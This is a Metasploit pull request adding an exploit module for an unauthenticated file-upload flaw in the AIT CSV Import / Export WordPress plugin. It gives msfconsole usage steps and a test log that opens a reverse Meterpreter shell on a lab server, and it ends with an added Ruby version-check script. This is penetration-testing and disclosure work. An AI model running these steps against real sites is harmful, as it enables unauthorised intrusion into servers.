
Wordpress Plugin: AIT CSV Import / Export RCE #14572

Merged (2 commits) on Jan 11, 2021

Conversation

h00die (Contributor) commented Jan 1, 2021

This PR adds an unauthenticated arbitrary file upload (and thus RCE) for the WordPress plugin AIT CSV Import / Export < 3.0.4.

The only real info I can find on it is https://vulners.com/wpvulndb/WPVDB-ID:10471

The plugin is a paid one, no free version, but you may be able to find the vulnerable version (3.0.3) if you google enough. Simply install the plugin, you don't even need to enable it, and you're good to go!

Verification

  • Start msfconsole
  • Install the plugin
  • Start msfconsole
  • Do: use exploits/multi/http/wp_ait_csv_rce
  • Do: set rhost [ip]
  • Do: set lhost [ip]
  • Do: run
  • You should get a shell.

space-r7 (Contributor) left a comment

Code LGTM!

Review comments (outdated, resolved) on:

  • documentation/modules/exploit/multi/http/wp_ait_csv_rce.md
  • modules/exploits/multi/http/wp_ait_csv_rce.rb (two comments)

@space-r7 space-r7 self-assigned this Jan 8, 2021
h00die (Contributor, Author) commented Jan 9, 2021

all fixed!

space-r7 (Contributor) commented:

Tested against v3.0.3 with WordPress v5.6, and it worked great:

msf6 > use exploit/multi/http/wp_ait_csv_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_ait_csv_rce) > options

Module options (exploit/multi/http/wp_ait_csv_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to WordPress installation
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   AIT CSV Import Export <3.0.4


msf6 exploit(multi/http/wp_ait_csv_rce) > set rhost 192.168.37.144
rhost => 192.168.37.144
msf6 exploit(multi/http/wp_ait_csv_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/wp_ait_csv_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/wp_ait_csv_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Found version 3.0.3 in the custom file
[+] The target appears to be vulnerable.
[*] Uploading payload: eSetW4.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 192.168.37.144
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:33196) at 2021-01-11 09:37:19 -0600
[+] Deleted eSetW4.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

@space-r7 space-r7 merged commit 7aef731 into rapid7:master Jan 11, 2021
space-r7 (Contributor) commented Jan 11, 2021

Release Notes

New module exploits/multi/http/wp_ait_csv_rce adds an exploit for various versions of the AIT CSV Import / Export plugin for WordPress. For plugin versions below v3.0.4, this module exploits an unauthenticated file upload vulnerability to gain code execution against WordPress installations.
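As an added example (not the Metasploit module's code, nor anything from this PR), a small Ruby check a defender could run over a plugin inventory to flag installs in the affected range the release note describes. The file paths and header contents are constructed samples; the header parsing assumes the WordPress convention of `Key: value` lines in the main plugin file's leading comment block.

```ruby
# Affected plugin name (matched case-insensitively) and first fixed version, from the PR text.
AFFECTED_PLUGIN = 'AIT CSV Import / Export'
FIXED_VERSION   = Gem::Version.new('3.0.4')

# Extract "Plugin Name" and "Version" from the leading comment block of a
# plugin's main file. Returns nil when the file does not look like a plugin.
def parse_plugin_header(contents)
  header = contents[%r{/\*\*?(.*?)\*/}m, 1]
  return nil unless header
  name    = header[/^\s*\*?\s*Plugin Name:\s*(.+?)\s*$/i, 1]
  version = header[/^\s*\*?\s*Version:\s*(\S+)\s*$/i, 1]
  return nil unless name && version
  { name: name, version: version }
end

# True when the header names the affected plugin and its version sorts below the
# fix. Gem::Version compares per component, so 3.0.10 is newer than 3.0.4.
def vulnerable?(plugin)
  return false unless plugin && plugin[:name].casecmp?(AFFECTED_PLUGIN)
  Gem::Version.new(plugin[:version]) < FIXED_VERSION
rescue ArgumentError
  false # malformed version string: do not guess, treat as not confirmed
end

# Given { path => file contents }, return the paths of affected plugins.
def find_vulnerable(plugin_files)
  plugin_files.select { |_, src| vulnerable?(parse_plugin_header(src)) }.keys
end

# Constructed sample inventory; slugs and header text are illustrative only.
SAMPLE_PLUGINS = {
  'ait-csv-import-export/ait-csv-import-export.php' => <<~PHP,
    <?php
    /*
    Plugin Name: AIT CSV Import / Export
    Version: 3.0.3
    */
  PHP
  'ait-csv-import-export-new/ait-csv-import-export.php' => <<~PHP,
    <?php
    /**
     * Plugin Name: AIT CSV Import / Export
     * Version: 3.0.10
     */
  PHP
  'hello-dolly/hello.php' => "<?php\n/*\nPlugin Name: Hello Dolly\nVersion: 1.7.2\n*/\n"
}.freeze

puts find_vulnerable(SAMPLE_PLUGINS).inspect if $PROGRAM_NAME == __FILE__
```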

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 11, 2021
@h00die h00die deleted the aitcsv branch January 11, 2021 22:12